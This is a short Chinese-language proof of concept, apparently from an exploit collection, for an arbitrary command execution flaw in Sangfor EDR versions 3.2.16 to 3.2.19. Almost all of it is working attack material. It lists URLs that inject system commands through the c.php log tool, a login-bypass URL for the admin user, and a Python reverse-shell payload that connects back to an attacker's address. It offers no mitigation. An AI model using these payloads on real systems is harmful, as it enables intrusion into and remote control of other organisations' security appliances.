深信服EDR任意命令执行漏洞
漏洞范围¶
EDR 3.2.16、3.2.17、3.2.19
漏洞POC¶
参数host/path/row/limit=命令 即可执行命令
https://*****/tool/log/c.php?strip_slashes=system&host=id
https://*****/tool/log/c.php?strip_slashes=system&path=id
https://*****/tool/log/c.php?strip_slashes=system&row=id
https://*****/tool/log/c.php?strip_slashes=system&limit=id
#越权登录
https://ip:xx/ui/login.php?user=admin #(用户名必须存在)
#命令执行
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=id
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=whoami
#反弹shell
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&path=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx.xx.xx.105',1919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
1.jpg
2.jpg
3.jpg